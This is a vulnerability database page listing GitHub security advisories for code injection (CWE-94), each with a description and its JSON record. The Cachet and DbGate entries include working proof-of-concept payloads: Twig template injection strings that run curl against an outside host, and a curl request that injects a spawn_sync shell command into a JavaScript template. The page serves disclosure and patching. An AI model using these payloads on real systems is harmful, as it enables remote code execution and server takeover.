Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8283 vulnerabilities reference this CWE, most recent first.

GHSA-HV79-P62R-WG3P

Vulnerability from github – Published: 2023-10-16 14:20 – Updated: 2023-10-16 14:20
VLAI
Summary
Cachet vulnerable to Authenticated Remote Code Execution
Details

Summary

A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within /cachet/app/Http/Routes/ApiRoutes.php, and attacker could control template input which is passed to laravel's dispatched handler /cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution.

This vulnerability does not exist within the Twig library itself, but exists during the process of the Cachet processing of the data without any filtration. This has been patched in Cachet version 2.4.

PoC

  1. Log in as a default user (non-admin);
  2. Create an incident with name slug1 and with content: {{ ['curl yourhost.com','']|sort('system') }} or with any other content for Remote code execution via the Twig, for instance: {{[0]|reduce('system','curl yourhost.com')}};
  3. Get an API token from your account settings (X-Cachet-Token);
  4. Trigger remote code execution using the api route:
POST /api/v1/incidents HTTP/1.1
Host: myapp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: XSRF-TOKEN=eyJpdiI6InZUVVpkRmx1VFlhcytVQkQ1Zk81b1E9PSIsInZhbHVlIjoiSlE0Tmt1cjVoRHFSOHBIR3RoYlAwS0dNZlVHbm02d0tWVW1ERVRvblZTTW1TMHV2MFJUYTNwQWQyZ3pQM1VlMyIsIm1hYyI6IjU4YzAxZjgyYWE4YTU4MTExMDQ3OGRhOTNlYThlZTYxMzI5YzBhMWVhM2RjYzA2ODgzMGVhMGQ5Njg2YTMyMjkifQ%3D%3D; laravel_session=eyJpdiI6IldZcHhMSjBYRmQzUXdGTTRQbGFQTWc9PSIsInZhbHVlIjoiSkRxWncxdWs3Y29ZcXVHMlJ0U2pVVVwvMGdvSUJNK2pEMnhsR2QzVnE1MmMxMWJxUm96K1VnalwvS1pYcXE2cGllIiwibWFjIjoiMDM0MGIxNjRlM2VhOGU5Mzg2OWVkYjZjNmJhY2JlMTE3OTdkMDRkZTQ1NzI5NTMzNzI4YjA5YTcwNzM2M2E5YyJ9
Connection: close
X-Cachet-Token: OeiLJ6G6kjsBXeyOo97z
Content-Length: 109
Content-type: application/json

{"template":"slug1", "name":"{{ ['curl pwned.riven.pw','']|sort('system') }}", "status":2, "visible":1}
  1. Obtain remote code execution. An attacker could also upload a web-shell using some base64 tricks with pipe to bash.

Impact

Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them more dangerous than a typical client-side template injection.

Mitigation

  1. Update TWIG to the latest version;
  2. Filter user-controlled data by any safe pattern;
  3. Use sandboxed twig mode;
  4. Don't allow users (non-admins) to trigger this vulnerability via the API endpoint.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "cachethq/cachet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-43661"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-16T14:20:53Z",
    "nvd_published_at": "2023-10-11T20:15:10Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nA template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version.  Within `/cachet/app/Http/Routes/ApiRoutes.php`, and attacker could control `template` input which is passed to `laravel\u0027s` dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution.\n\nThis vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself, but exists during the process of the [Cachet](https://github.com/cachethq/cachet) processing of the data without any filtration. This has been patched in Cachet version  2.4.\n\n### PoC\n\n1. Log in as a default user (non-admin);\n2. Create an incident with name `slug1` and with content: `{{ [\u0027curl yourhost.com\u0027,\u0027\u0027]|sort(\u0027system\u0027) }}` or with any other content for `Remote code execution` via the `Twig`, for instance: `{{[0]|reduce(\u0027system\u0027,\u0027curl yourhost.com\u0027)}}`;\n3. Get an `API` token from your account settings (`X-Cachet-Token`);\n4. Trigger remote code execution using the `api` route: \n\n```\nPOST /api/v1/incidents HTTP/1.1\nHost: myapp\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nCookie: XSRF-TOKEN=eyJpdiI6InZUVVpkRmx1VFlhcytVQkQ1Zk81b1E9PSIsInZhbHVlIjoiSlE0Tmt1cjVoRHFSOHBIR3RoYlAwS0dNZlVHbm02d0tWVW1ERVRvblZTTW1TMHV2MFJUYTNwQWQyZ3pQM1VlMyIsIm1hYyI6IjU4YzAxZjgyYWE4YTU4MTExMDQ3OGRhOTNlYThlZTYxMzI5YzBhMWVhM2RjYzA2ODgzMGVhMGQ5Njg2YTMyMjkifQ%3D%3D; laravel_session=eyJpdiI6IldZcHhMSjBYRmQzUXdGTTRQbGFQTWc9PSIsInZhbHVlIjoiSkRxWncxdWs3Y29ZcXVHMlJ0U2pVVVwvMGdvSUJNK2pEMnhsR2QzVnE1MmMxMWJxUm96K1VnalwvS1pYcXE2cGllIiwibWFjIjoiMDM0MGIxNjRlM2VhOGU5Mzg2OWVkYjZjNmJhY2JlMTE3OTdkMDRkZTQ1NzI5NTMzNzI4YjA5YTcwNzM2M2E5YyJ9\nConnection: close\nX-Cachet-Token: OeiLJ6G6kjsBXeyOo97z\nContent-Length: 109\nContent-type: application/json\n\n{\"template\":\"slug1\", \"name\":\"{{ [\u0027curl pwned.riven.pw\u0027,\u0027\u0027]|sort(\u0027system\u0027) }}\", \"status\":2, \"visible\":1}\n``` \n\n5. Obtain remote code execution. An attacker could also upload a web-shell using some base64 tricks with pipe to bash. \n\n### Impact\n\nServer-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them more dangerous than a typical client-side template injection.\n\n### Mitigation\n\n1. Update `TWIG` to the latest version; \n2. Filter user-controlled data by any safe pattern;\n3. Use `sandboxed` `twig` mode;\n4. Don\u0027t allow users (non-admins) to trigger this vulnerability via the `API` endpoint.",
  "id": "GHSA-hv79-p62r-wg3p",
  "modified": "2023-10-16T14:20:53Z",
  "published": "2023-10-16T14:20:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cachethq/cachet/security/advisories/GHSA-hv79-p62r-wg3p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43661"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cachethq/cachet/commit/6fb043e109d2a262ce3974e863c54e9e5f5e0587"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cachethq/cachet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Cachet vulnerable to Authenticated Remote Code Execution"
}

GHSA-HV83-GGC4-V385

Vulnerability from github – Published: 2026-06-05 16:39 – Updated: 2026-07-08 17:36
VLAI
Summary
DbGate: Remote Code Execution via functionName injection in loadReader endpoint
Details

Summary

The POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction.

Details

The loadReader endpoint in packages/api/src/controllers/runners.js (line 353) takes a functionName parameter from the request body and passes it to compileShellApiFunctionName() which performs no sanitization:

Vulnerable code (permalink):

  loadReader_meta: true,
  async loadReader({ functionName, props }) {
    if (!platformInfo.isElectron) {
      if (props?.fileName && !checkSecureDirectories(props.fileName)) {
        return { errorMessage: 'DBGM-00289 Unallowed file' };
      }
    }
    const prefix = extractShellApiPlugins(functionName)
      .map(packageName => `// @require ${packageName}\n`)
      .join('');

    const promise = new Promise((resolve, reject) => {
      const runid = crypto.randomUUID();
      this.requests[runid] = { resolve, reject, exitOnStreamError: true };
      this.startCore(runid, loaderScriptTemplate(prefix, functionName, props, runid));
    });
    return promise;
  },

The loaderScriptTemplate at line 57-68 directly interpolates the compiled function name:

const loaderScriptTemplate = (prefix, functionName, props, runid) => `
${prefix}
const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
${requirePluginsTemplate(extractShellApiPlugins(functionName, props))}
require=null;
async function run() {
const reader=await ${compileShellApiFunctionName(functionName)}(${JSON.stringify(props)});
const writer=await dbgateApi.collectorWriter({runid: '${runid}'});
await dbgateApi.copyStream(reader, writer);
}
dbgateApi.runScript(run);
`;

The compileShellApiFunctionName in packages/tools/src/packageTools.ts (line 30-35) performs no validation:

export function compileShellApiFunctionName(functionName) {
  const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);
  if (nsMatch) {
    return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;
  }
  return `dbgateApi.${functionName}`;
}

Two injection vectors: 1. Without @: The entire functionName is appended after dbgateApi. without sanitization 2. With @: The part before @ (nsMatch[1]) is appended after .shellApi. without sanitization (only the part after @ goes through _camelCase)

Although the script template sets require=null, the process global is still available. process.binding("spawn_sync") provides direct access to spawn child processes, completely bypassing the sandbox.

Compare with safe code in the same file (line 292):

  start_meta: true,
  async start({ script }, req) {
    // ...
    await testStandardPermission('run-shell-script', req);  // <-- Permission check!
    if (!platformInfo.allowShellScripting) {                 // <-- Platform check!
      return { errorMessage: 'DBGM-00286 Shell scripting is not allowed' };
    }
    // ...
  },

The start endpoint requires the run-shell-script permission and checks allowShellScripting. The loadReader endpoint has neither of these checks, making it a privilege escalation from any authenticated user to full RCE.

PoC

An authenticated user sends a POST request to /runners/load-reader with a crafted functionName:

# The malicious functionName breaks out of the expression and injects
# process.binding("spawn_sync") to execute arbitrary commands.
# The // at the end comments out the remaining template code.

curl -X POST http://TARGET:3000/runners/load-reader \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT_TOKEN>" \
  -d '{
    "functionName": "toString();var __r=process.binding(\"spawn_sync\").spawn({file:\"/bin/sh\",args:[\"/bin/sh\",\"-c\",\"id > /tmp/dbgate-rce-proof\"],envPairs:[],stdio:[{type:\"pipe\",readable:true,writable:false},{type:\"pipe\",readable:false,writable:true},{type:\"pipe\",readable:false,writable:true}]});dbgateApi.toString//",
    "props": {}
  }'

This generates the following JavaScript that is forked as a child process:

const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
require=null;
async function run() {
const reader=await dbgateApi.toString();var __r=process.binding("spawn_sync").spawn({file:"/bin/sh",args:["/bin/sh","-c","id > /tmp/dbgate-rce-proof"],envPairs:[],stdio:[{type:"pipe",readable:true,writable:false},{type:"pipe",readable:false,writable:true},{type:"pipe",readable:false,writable:true}]});dbgateApi.toString//({})
// ... rest of template
}
dbgateApi.runScript(run);

After the request, /tmp/dbgate-rce-proof contains the output of id, confirming arbitrary command execution.

A standalone PoC script is available at: reports/cve-hunting/pocs/dbgate/rce_loadreader_functionname_injection.py

Impact

An authenticated user with basic access (no admin role, no run-shell-script permission required) can:

  1. Execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process
  2. Read/write any file accessible to the process
  3. Pivot to connected databases by reading connection credentials from DbGate's storage
  4. Compromise the host system - in Docker deployments, this typically means root access within the container

This is particularly severe because: - No special permissions are required beyond basic authentication - The require=null sandbox is completely bypassed via process.binding("spawn_sync") - The loadReader endpoint lacks the permission checks present on the start endpoint - DbGate is commonly deployed as a web-accessible database management tool

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.1.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "dbgate-api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48017"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-05T16:39:38Z",
    "nvd_published_at": "2026-06-15T22:16:16Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe `POST /runners/load-reader` endpoint in DbGate accepts a `functionName` parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the `require=null` sandbox restriction.\n\n### Details\n\nThe `loadReader` endpoint in `packages/api/src/controllers/runners.js` (line 353) takes a `functionName` parameter from the request body and passes it to `compileShellApiFunctionName()` which performs no sanitization:\n\n**Vulnerable code** ([permalink](https://github.com/dbgate/dbgate/blob/ea3a61077ab09775c39890c465f0b3e97f6c812e/packages/api/src/controllers/runners.js#L352-L368)):\n\n```javascript\n  loadReader_meta: true,\n  async loadReader({ functionName, props }) {\n    if (!platformInfo.isElectron) {\n      if (props?.fileName \u0026\u0026 !checkSecureDirectories(props.fileName)) {\n        return { errorMessage: \u0027DBGM-00289 Unallowed file\u0027 };\n      }\n    }\n    const prefix = extractShellApiPlugins(functionName)\n      .map(packageName =\u003e `// @require ${packageName}\\n`)\n      .join(\u0027\u0027);\n\n    const promise = new Promise((resolve, reject) =\u003e {\n      const runid = crypto.randomUUID();\n      this.requests[runid] = { resolve, reject, exitOnStreamError: true };\n      this.startCore(runid, loaderScriptTemplate(prefix, functionName, props, runid));\n    });\n    return promise;\n  },\n```\n\nThe `loaderScriptTemplate` at line 57-68 directly interpolates the compiled function name:\n\n```javascript\nconst loaderScriptTemplate = (prefix, functionName, props, runid) =\u003e `\n${prefix}\nconst dbgateApi = require(process.env.DBGATE_API);\ndbgateApi.initializeApiEnvironment();\n${requirePluginsTemplate(extractShellApiPlugins(functionName, props))}\nrequire=null;\nasync function run() {\nconst reader=await ${compileShellApiFunctionName(functionName)}(${JSON.stringify(props)});\nconst writer=await dbgateApi.collectorWriter({runid: \u0027${runid}\u0027});\nawait dbgateApi.copyStream(reader, writer);\n}\ndbgateApi.runScript(run);\n`;\n```\n\nThe `compileShellApiFunctionName` in `packages/tools/src/packageTools.ts` (line 30-35) performs no validation:\n\n```typescript\nexport function compileShellApiFunctionName(functionName) {\n  const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);\n  if (nsMatch) {\n    return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;\n  }\n  return `dbgateApi.${functionName}`;\n}\n```\n\n**Two injection vectors:**\n1. Without `@`: The entire `functionName` is appended after `dbgateApi.` without sanitization\n2. With `@`: The part before `@` (`nsMatch[1]`) is appended after `.shellApi.` without sanitization (only the part after `@` goes through `_camelCase`)\n\nAlthough the script template sets `require=null`, the `process` global is still available. `process.binding(\"spawn_sync\")` provides direct access to spawn child processes, completely bypassing the sandbox.\n\n**Compare with safe code in the same file** (line 292):\n\n```javascript\n  start_meta: true,\n  async start({ script }, req) {\n    // ...\n    await testStandardPermission(\u0027run-shell-script\u0027, req);  // \u003c-- Permission check!\n    if (!platformInfo.allowShellScripting) {                 // \u003c-- Platform check!\n      return { errorMessage: \u0027DBGM-00286 Shell scripting is not allowed\u0027 };\n    }\n    // ...\n  },\n```\n\nThe `start` endpoint requires the `run-shell-script` permission and checks `allowShellScripting`. The `loadReader` endpoint has **neither** of these checks, making it a privilege escalation from any authenticated user to full RCE.\n\n### PoC\n\nAn authenticated user sends a POST request to `/runners/load-reader` with a crafted `functionName`:\n\n```bash\n# The malicious functionName breaks out of the expression and injects\n# process.binding(\"spawn_sync\") to execute arbitrary commands.\n# The // at the end comments out the remaining template code.\n\ncurl -X POST http://TARGET:3000/runners/load-reader \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer \u003cJWT_TOKEN\u003e\" \\\n  -d \u0027{\n    \"functionName\": \"toString();var __r=process.binding(\\\"spawn_sync\\\").spawn({file:\\\"/bin/sh\\\",args:[\\\"/bin/sh\\\",\\\"-c\\\",\\\"id \u003e /tmp/dbgate-rce-proof\\\"],envPairs:[],stdio:[{type:\\\"pipe\\\",readable:true,writable:false},{type:\\\"pipe\\\",readable:false,writable:true},{type:\\\"pipe\\\",readable:false,writable:true}]});dbgateApi.toString//\",\n    \"props\": {}\n  }\u0027\n```\n\nThis generates the following JavaScript that is forked as a child process:\n\n```javascript\nconst dbgateApi = require(process.env.DBGATE_API);\ndbgateApi.initializeApiEnvironment();\nrequire=null;\nasync function run() {\nconst reader=await dbgateApi.toString();var __r=process.binding(\"spawn_sync\").spawn({file:\"/bin/sh\",args:[\"/bin/sh\",\"-c\",\"id \u003e /tmp/dbgate-rce-proof\"],envPairs:[],stdio:[{type:\"pipe\",readable:true,writable:false},{type:\"pipe\",readable:false,writable:true},{type:\"pipe\",readable:false,writable:true}]});dbgateApi.toString//({})\n// ... rest of template\n}\ndbgateApi.runScript(run);\n```\n\nAfter the request, `/tmp/dbgate-rce-proof` contains the output of `id`, confirming arbitrary command execution.\n\nA standalone PoC script is available at: `reports/cve-hunting/pocs/dbgate/rce_loadreader_functionname_injection.py`\n\n### Impact\n\nAn authenticated user with **basic access** (no admin role, no `run-shell-script` permission required) can:\n\n1. **Execute arbitrary OS commands** on the DbGate server with the privileges of the Node.js process\n2. **Read/write any file** accessible to the process\n3. **Pivot to connected databases** by reading connection credentials from DbGate\u0027s storage\n4. **Compromise the host system** - in Docker deployments, this typically means root access within the container\n\nThis is particularly severe because:\n- No special permissions are required beyond basic authentication\n- The `require=null` sandbox is completely bypassed via `process.binding(\"spawn_sync\")`\n- The `loadReader` endpoint lacks the permission checks present on the `start` endpoint\n- DbGate is commonly deployed as a web-accessible database management tool",
  "id": "GHSA-hv83-ggc4-v385",
  "modified": "2026-07-08T17:36:00Z",
  "published": "2026-06-05T16:39:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48017"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dbgate/dbgate"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "DbGate: Remote Code Execution via functionName injection in loadReader endpoint"
}

GHSA-HV8V-455M-2GRC

Vulnerability from github – Published: 2025-05-28 18:33 – Updated: 2025-05-28 18:33
VLAI
Details

Kea configuration and API directives can be used to load a malicious hook library. Many common configurations run Kea as root, leave the API entry points unsecured by default, and/or place the control sockets in insecure paths. This issue affects Kea versions 2.4.0 through 2.4.1, 2.6.0 through 2.6.2, and 2.7.0 through 2.7.8.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-32801"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-28T17:15:23Z",
    "severity": "HIGH"
  },
  "details": "Kea configuration and API directives can be used to load a malicious hook library.  Many common configurations run Kea as root, leave the API entry points unsecured by default, and/or place the control sockets in insecure paths.\nThis issue affects Kea versions 2.4.0 through 2.4.1, 2.6.0 through 2.6.2, and 2.7.0 through 2.7.8.",
  "id": "GHSA-hv8v-455m-2grc",
  "modified": "2025-05-28T18:33:28Z",
  "published": "2025-05-28T18:33:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32801"
    },
    {
      "type": "WEB",
      "url": "https://kb.isc.org/docs/cve-2025-32801"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HVCJ-PFQ5-3R38

Vulnerability from github – Published: 2022-05-02 03:17 – Updated: 2022-05-02 03:17
VLAI
Details

Multiple PHP remote file inclusion vulnerabilities in index.php in Cybershade CMS 0.2b, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) THEME_header and (2) THEME_footer parameters.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-0701"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-02-23T15:30:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple PHP remote file inclusion vulnerabilities in index.php in Cybershade CMS 0.2b, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) THEME_header and (2) THEME_footer parameters.",
  "id": "GHSA-hvcj-pfq5-3r38",
  "modified": "2022-05-02T03:17:47Z",
  "published": "2022-05-02T03:17:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-0701"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/47725"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/7668"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/33101"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-HVJV-R7F5-RGRV

Vulnerability from github – Published: 2022-05-17 01:49 – Updated: 2025-04-11 03:55
VLAI
Details

Unspecified vulnerability in the RV40 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before 15.02.71, and RealPlayer SP 1.0 through 1.1.5, allows remote attackers to execute arbitrary code via a crafted RV40 RealVideo video stream.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-0925"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-02-08T15:55:00Z",
    "severity": "HIGH"
  },
  "details": "Unspecified vulnerability in the RV40 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before 15.02.71, and RealPlayer SP 1.0 through 1.1.5, allows remote attackers to execute arbitrary code via a crafted RV40 RealVideo video stream.",
  "id": "GHSA-hvjv-r7f5-rgrv",
  "modified": "2025-04-11T03:55:16Z",
  "published": "2022-05-17T01:49:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0925"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73021"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/78914"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/47896"
    },
    {
      "type": "WEB",
      "url": "http://service.real.com/realplayer/security/02062012_player/en"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/51887"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-HVMF-HX9F-CCX5

Vulnerability from github – Published: 2022-05-01 23:57 – Updated: 2022-05-01 23:57
VLAI
Details

PHP remote file inclusion vulnerability in modules/global/inc/content.inc.php in BoonEx Ray 3.5, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sIncPath parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-3166"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-07-14T23:41:00Z",
    "severity": "HIGH"
  },
  "details": "PHP remote file inclusion vulnerability in modules/global/inc/content.inc.php in BoonEx Ray 3.5, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sIncPath parameter.",
  "id": "GHSA-hvmf-hx9f-ccx5",
  "modified": "2022-05-01T23:57:21Z",
  "published": "2022-05-01T23:57:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-3166"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/43644"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/6028"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/30999"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/3994"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2008/2033/references"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-HVP2-HCHP-M52H

Vulnerability from github – Published: 2022-05-13 01:16 – Updated: 2022-05-13 01:16
VLAI
Details

The USB drivers in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allow physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-3200"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2013-10-09T14:53:00Z",
    "severity": "HIGH"
  },
  "details": "The USB drivers in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allow physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka \"Windows USB Descriptor Vulnerability.\"",
  "id": "GHSA-hvp2-hchp-m52h",
  "modified": "2022-05-13T01:16:02Z",
  "published": "2022-05-13T01:16:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-3200"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-081"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18630"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/ncas/alerts/TA13-288A"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-HVP3-QRPC-R6HH

Vulnerability from github – Published: 2023-05-12 15:30 – Updated: 2025-11-05 21:30
VLAI
Details

A Remote Code Execution (RCE) vulnerability in /be/rpc.php in Jedox 2020.2.5 allows remote authenticated users to load arbitrary PHP classes from the 'rtn' directory and execute its methods.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-47879"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-12T14:15:09Z",
    "severity": "HIGH"
  },
  "details": "A Remote Code Execution (RCE) vulnerability in /be/rpc.php in Jedox 2020.2.5 allows remote authenticated users to load arbitrary PHP classes from the \u0027rtn\u0027 directory and execute its methods.",
  "id": "GHSA-hvp3-qrpc-r6hh",
  "modified": "2025-11-05T21:30:56Z",
  "published": "2023-05-12T15:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47879"
    },
    {
      "type": "WEB",
      "url": "https://docs.syslifters.com/assets/vulnerability-disclosure/Vulnerability-Disclosure-Jedox-Jedox-04-2023.pdf"
    },
    {
      "type": "WEB",
      "url": "https://jedox.mantishub.io/app/issues/57236"
    },
    {
      "type": "WEB",
      "url": "https://jedox.mantishub.io/app/issues/57237"
    },
    {
      "type": "WEB",
      "url": "https://jedox.mantishub.io/app/issues/57238"
    },
    {
      "type": "WEB",
      "url": "https://jedox.mantishub.io/app/issues/57239"
    },
    {
      "type": "WEB",
      "url": "http://jedox.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
